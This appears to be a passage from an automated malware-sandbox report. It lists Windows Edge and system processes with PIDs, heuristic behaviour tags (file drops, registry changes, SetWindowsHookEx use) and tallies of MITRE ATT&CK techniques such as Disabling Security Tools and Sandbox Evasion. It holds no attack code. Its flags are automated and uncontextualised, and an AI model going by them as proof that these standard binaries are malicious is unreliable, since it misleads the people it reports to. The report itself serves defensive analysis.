C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8412
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:9208
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵PID:4536
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k wsappx -s AppXSvc1⤵PID:4396
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:8996
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:7984
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:6600
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:7108
Network
MITRE ATT&CK Enterprise v6
Persistence
BITS Jobs
1Change Default File Association
1Modify Existing Service
1Registry Run Keys / Startup Folder
3Scheduled Task
1Defense Evasion
BITS Jobs
1Disabling Security Tools
1Install Root Certificate
1Modify Registry
6Virtualization/Sandbox Evasion
1Web Service
1